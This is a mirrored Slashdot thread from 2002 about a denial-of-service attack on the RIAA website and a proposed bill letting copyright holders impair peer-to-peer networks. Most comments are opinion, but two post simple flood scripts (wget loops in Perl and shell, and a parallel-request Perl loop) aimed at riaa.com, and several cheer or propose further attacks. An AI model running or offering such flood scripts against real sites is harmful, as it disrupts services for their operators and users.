Slashdot Mirror

← Back to Stories (view on slashdot.org)

RIAA Smacked by DoS

Posted by CmdrTaco on from the gonna-get-messy-before-it-gets-clean dept.

nekid writes "ZDNet is reporting that the RIAA's website was hit by a denial-of-service (DoS) attack over the weekend, most likely in response to their endorsement of legislation that would give them permission to do the same to personal computers that are pirating music (see earlier article). Seems to me that they are killing themselves with bad public relations..." But it seems to me that they don't care, and are instead banking on the ignorance of the bulk of the world.

26 of 831 comments (clear)

  1. Userfriendly by Sobrique · · Score: 4, Interesting

    Userfriendly link for those who didn't see it :)
    A tragic irony isn't it?
    I wonder if we can start a campaign to keep the RIAA DoSed off the net. Not that I'd ever condone such a thing, but there are times when a little net abuse is so poetic.

    1. Re:Userfriendly by zerocool^ · · Score: 3, Interesting

      http://ars.userfriendly.org/cartoons/?id=20020623% 26mode=classic

      That's another userfriendly link to an RIAA centric cartoon.

      ~Will

      --
      sig?
  2. bad publicity... by bje2 · · Score: 4, Interesting

    wow, didn't they get enough publicity when this story was announced last week...i'm not saying they should have ignored this DOS attack, but it seems to me the RIAA rep had a little too much attitude with quotes like "Don't they have something better to do during the summer than hack our site?" and especially "Perhaps it at least took 10 minutes away from stealing music."...talk about antogonizing the masses...couldn't they comment on this story without being blatantly condescending and arrogant???

    on the good side, maybe the link to the RIAA website with this story will slashdot their site and bring it down again....

    --

    "Facts are meaningless. You could use facts to prove anything that's even remotely true." - Homer Simpson
  3. Bad public relations? Doubtful. by Anonymous Coward · · Score: 1, Interesting
    Seems to me that they are killing themselves with bad public relations...
    Think different.

    Here's the predicted headline: "Hackers Respond to RIAA's Proposed Legislation By Vandalizing Website".

    That is, RIAA: mature and respectful, Anti-RIAA: bratty idiotic thugs.

  4. What is amusing is..... by Viewsonic · · Score: 3, Interesting

    If the RIAA downloads illegal MP3s, even to check to see if they're legit illegal copies, this in turn opens THEM of for legit DoS attacks. The person in question that is doing the "checking" for the RIAA better own the right to every single MP3 he downloads. They're going to need to have the artists themselves sit at the cpus and do the DoS's for this to even be legal, it can't be based around "trust". Quite an evil little repurcussion .. If this goes live, it will effectively DESTROY the RIAA.

  5. voluntary dos by drDugan · · Score: 5, Interesting


    #!/usr/bin/perl

    while (1){

    `wget "http://www.riaa.com" -nc -r -l 0 -k -nH -o /dev/null -O /dev/null`;

    }

    # one of many many ways to do this...

    1. Re:voluntary dos by Anonymous Coward · · Score: 1, Interesting

      are you some sort of crack monkey, or what?

      #!/bin/sh

      while true
      do
      wget http://www.riaa.com -nc -r -l 0 -k -nH -o/dev/null -O/dev/null &
      done
      ==============
      *or*
      ==============
      #!/usr/bin/perl

      use LWP::Parallel::UserAgent;
      use HTTP::Request;

      my $req = HTTP::Request->new('GET','http://www.riaa.com') ;

      my $pua = LWP::Parallel::UserAgent->new();
      $pua->in_order(0);
      $pua->duplicates(1);
      $pua->timeout(5);
      $pua->redirect(0);

      while (1)
      {
      $pua->register($req);
      }

      #don't mix and match perl and sh like that unless absolutely necessary.
      #it's ugly and wastes resources

  6. Artists aren't the only ones who make an effort... by Tall+Rob+Mc · · Score: 2, Interesting
    On Thursday, the RIAA endorsed a bill written by Rep. Howard Berman, D-Calif., that would authorize copyright holders to begin "blocking, diverting or otherwise impairing" peer-to-peer networks. RIAA CEO Hilary Rosen said in a statement that Berman's bill was "an innovative approach," adding that "it makes sense to clarify existing laws to ensure that copyright owners--those who actually take the time and effort to create an artistic work--are at least able to defend their works from mass piracy."

    What about all of the programmers who actually take the time and effort to establish worldwide networks where people can directly share information? Who is the RIAA to decide which person's effort is worth more?
  7. There has to be a better idea to stopping the RIAA by sjgman9 · · Score: 2, Interesting

    They "hire" companies that run search spider programs that automate dns queries and instant cease and desist letters. Lets slashdot all the sites of all the companies that act as bounty hunters on the behalf of the RIAA. If not, then at least get their netblocks known and firewall them off to null. That way they cant find us or do anything

  8. Conspiracy theory. by WiredOni · · Score: 2, Interesting

    I have the feeling that the RIAA could have done this to themselves so that they could drum up support for their bill and what ever they try to pass. What better way to gain simpathy and support then to DOS or give the impression that you where DOSed? While I think the RIAA was immature with their comments and actions, a DOS gives off the impression that P2P users are really immature.

  9. Re:Mature by Jucius+Maximus · · Score: 3, Interesting

    If anything good comes of this, it will be the publicity. Let's hope an intelligent columnist clues into what's really going on and lets the general public know about it.

  10. Re:Mature by lightcycler · · Score: 5, Interesting

    "Immaturity like this only HARMS what we are trying to do."

    WTF? The music industry just started illegally interfering with computer networks to the detriment of others (hacking, to misuse that word), and people complain that a DDOS on their website is immature?

    As immature perhaps, as spending millions in congress to disrupt others' computers, before sarcastically quipping "at least they've stopped stealing for 10 minutes" when someone does the same back to them?

    Bring it on. The more this group's website gets attacked, the happier I'll feel laughing at them. They want to legalise hacking? Let's show people what it will mean in practise.

    Need I remind anyone here that individuals are copyright-holders too?

  11. Re:Mature by Fat+Casper · · Score: 4, Interesting
    I'm sure that Andovernet would prosecute anyone who DOS'd ./ over a political disagreement.

    The RIAA just bought a bill to legalize DOSs as part of a political disagreement.

    These DOS attacks are not justice,

    Which is the point that this weekend's perps were trying to illustrate.

    --
    I spent a year in Iraq looking for WMD and all I found was this lousy sig.
  12. If you're smart, capable, and under 18 by Inoshiro · · Score: 3, Interesting

    This kind of thing, short of FLYING over to their HQ and having a sit in, is the only means you have of expressing yourself.

    --
    --
    Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
  13. Re:Mature by YanceyAI · · Score: 3, Interesting

    Do you think the RIAA would consider being slashdotted a DoS attack?

    --
    Can I bum a sig?
  14. considering the alternative... by zoombat · · Score: 3, Interesting
    I was about to defend the act.. because really, what are they supposed to do to prevent a distributed network of thousands of users from illegally trading copyrighted files?? They can't really take them all to court...

    I like that the bill requires them to NOTIFY the Attorney General before they do anything... I don't like that they don't have to wait for approval.

    So I started to think... "How would I feel if I was faced with 1000's of people scattered covertly across the country violating my rights?" Then I realized that I do... SPAMers. Sure, if I had the time, money, and expertise, I could take them each to court. But the reality is that even if I get SPAM, the best I can do is report the SPAMer to their ISP and hope they're not SPAM-friendly and will shut the account/network connection down.

    So either they should allow us to DoS or hack SPAMers' computers, or they should require the RIAA or whomever to get ISPs to shut down illegal file sharing internet connections.. just like the rest of us.

  15. It was bound to happen sooner or later. by El+Jynx · · Score: 2, Interesting

    Besides, I think it's good to give one decent dDOS as a 'shot across the bow' so the RIAA knows what it's playing with. Should the legislature be approved, I somehow don't think the RIAA site will stay online very long anymore; there's relatively few people who control so many computers that they can dDOS at their leisure, but there's enough. Had the dDOS's started after the bill was approved then it would have been next to useless. Now it's still next to useless, but it sparks up a lot more discussion.

    Jynx

    The RIAA is still a group of fools, though; the boomerang is swinging back to hit them in the face much in the same way US citizens are being screwed for doctor support because everyone's sueing them. US legislature just goes too far in that respect.

    --
    A positive attitude may not solve all your problems, but it will annoy enough people to make it well worth the effort.
    1. Re:It was bound to happen sooner or later. by Hater's+Leaving,+The · · Score: 2, Interesting

      Agreed.

      I reckon that it would be interesteing if the P2P networks were to have a "cry for help" facility, such that if a peer thought it was being dDOSed by the RIAA or whomever else, it would summon help from other peers. Hmmm, currently the only 'help' I can imagine is a return dDOS against the RIAA.

      Welcome to the MAdD scenario, Mutually Assured distributed Destruction!

      Of course everyone apart from those who paid off the politicians would probably end up in jail - remember to leave your computers switched on, though, as they arrest you.

      THL.

      --
      Keeping /. cynic density high since the fscking Kwhores/trolls arrived.
  16. The RIAA just doesn't get it by dkroells · · Score: 5, Interesting

    In all of this law making, the RIAA has not realized a few basic facts. Most of these are relative to me, but I'm sure I'm not alone:

    1. When Napster was big, I purchased 75-100 CDs in two years and enjoyed about 80% of them. Since then, I have purchased about 10 CDs and enjoyed about 20% of them. I would rather gamble $15 on a blackjack table then buy a $15 CD when I have only heard one song I like on it.

    2. I don't own a plain-old CD player. I have a MP3-CD player, a laptop, and a desktop. If I can't listen to or convert the CD I won't buy it.

    3. I'm not a fan of the MPAA either, but which would you rather purchase: A soundtrack CD of a given movie for $17.99 or the DVD of the same movie for $14.99? To me, a music CD is worth about $8, and at least 25% of that should go to the people who actually created those sounds(artists, songwriters).

    4. I don't believe the DoS on the RIAA last weekend was necessary, but it will be a preview of what will happen if that new law passes. (Just a prediction)

    5. What ever happened to "The customer is always right"? All of this copy-protection, "everyone is stealing our music", "we need tougher laws" stuff can't possibly be in the consumer's best interest. Sounds to me that they are trying to maintain a monopoly. (Hmmm... now where have I seen this before?)

    Anyway, I dig into my current music collection, books, magazines, and a few select internet sites for my media these days. I've just about had enough. Everything in this post is my opinion based on some facts and is probably in need of some correction. Have a nice day.

  17. Re:Mature by careo · · Score: 2, Interesting

    I'm sure the RIAA knows this and are grinning at their (mis)fortune and calling their congressional lackeys about it.

    Hell, they might even have had the webmaster pull the plug on the machine for the weekend so they can say, "Look old chum, these Internet chaps are evil and need to be stopped."

    Either that, or it's the script kiddy way of applying for a job with the RIAA.

  18. We don't need legislation to stay within the law by csnydermvpsoft · · Score: 5, Interesting

    That's an interesting concept - if we plan a day in advance to something of the effect of "at 5:00EDT, everyone go to the RIAA site" - that would create a very effective, yet very legal, DoS.

    OK, everyone, tomorrow, July 31, 5:00EDT, attack. :-)

    We don't need legislation.

  19. Re:Great job... by digitalsushi · · Score: 5, Interesting
    speaking of immature...

    "Don't they have something better to do during the summer than hack our site?" asked the RIAA representative, who asked not to be identified. "Perhaps it at least took 10 minutes away from stealing music."

    Yeah. We get it. They're internet hackers on summer break, so they must be stealing music! Sorry I just find the slant on that RIAA quote as half troll/closer to flamebait. Course as someone else said, thats the point of the RIAA- get the people angry at them and not their members.

    --
    slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
  20. RIAA offline by PinkFloyd · · Score: 2, Interesting
    Actually, riaa.org is still alive and well, though riaa.com is off the air...

    --

    The face of a child can say it all, especially the mouth part of the face.
  21. A Mature Denial of Service attack by gnugnugnu · · Score: 4, Interesting

    from http://www.vigilante.com/inetsecurity/hacktivism_1 .htm

    There is an important corresponding technical dimension that reinforces hacktivist claims of populist support. Hacktivist DoS attacks must be executed using client side or individual browser based tools. The prototypical Zapatista Floodnet tool, (which other groups have continued to develop) requires downloading and installing a Java applet. Moreover, these tools need to be consciously scheduled and aimed at a specific web address; actions that presumably demonstrate solidarity and commitment. To some hacktivists this distinction is all-important because it differentiates their activities from the nihilistic and anonymous February DDoS attacks on the CNN, Yahoo, and eBay e-commerce sites. During those assaults, allegedly orchestrated by "mafiaboy" and a few other apolitical participants, DoS "zombie" servers were surreptitiously placed on unwary host systems and triggered en masse. In fact, the utility programs used for swarming attacks, rooted in performance art, are far less powerful than hardcore "smurfing" weapons like Trin00, Stachaldraht and TFN2K.

    Flood attacks can be used as a useful form of civil disobedience if used correctly in a *focussed and organised* way.

  22. RIAA site not down? by FIRESTORM_v1 · · Score: 2, Interesting

    I am detecting someone's mucking with the javascript....

    You go to this site http://www.riaa.comand you get the generic error:

    HTTP Error 403

    403.9 Access Forbidden: Too many users are connected

    This error can be caused if the Web server is busy and cannot process your request due to heavy traffic. Please try to connect again later.

    Please contact the Web server's administrator if the problem persists.

    However..... if you rightclick and go to "View Source" you see the source page for their index.htm like so: (note: code mangled to prevent rendering... Don't want to fsck Slashdot by accident!)

    < html >
    < head >
    < title >Recording Industry Association of America< /title >
    < meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" >
    <meta content="ISRC, International Standard Recording Code" >
    <script language="JavaScript" >
    < !-- hide from JavaScript-challenged browsers
    function openWindow() {

    popupWin = window.open('Glossary.cfm', 'glossary', 'scrollbars,width=500,height=300')

    }

    function openPrintWindow() {

    printWin = window.open('Printing.cfm', 'printing', 'scrollbars,width=500,height=300');

    } // done hiding -->
    </script>

    <script LANGUAGE="JavaScript">
    <!--

    NS4 = (document.layers);
    IE4 = (document.all);
    ver4 = (NS4 || IE4);
    isBlueberry = (navigator.appVersion.indexOf("Mac") != -1);
    isPC = (navigator.appVersion.indexOf("Win") != -1);
    isCool = (navigator.appVersion.indexOf("X11") != -1);
    isMenu = (NS4 || (IE4 && !isBlueberry));

    function popUp(){return};
    function popDown(){return};

    (damn lameness filter, place an <hr> here)

    Just my .02c (Note: by reading this message and the text within you agree not to hold, this user, this user's ISP or slashdot responsible for any of our actions....

    --
    Partnership for an idiot free America!
  23. What's not being mentioned ... by freaker_TuC · · Score: 2, Interesting

    ... The RIAA will get the right to DOS a user trading music though who is actually affected most? the ISP delivering the connection or the user?

    This way the entire thing will get another approach and also affects the backbones and ISP's. Do they need to find a ISP where they have legal status to DOS another (ISP's) user ?

    --
    --- I am known for the ones who want to find me on the net. Is that a privacy risk or a privilege? One might wonder..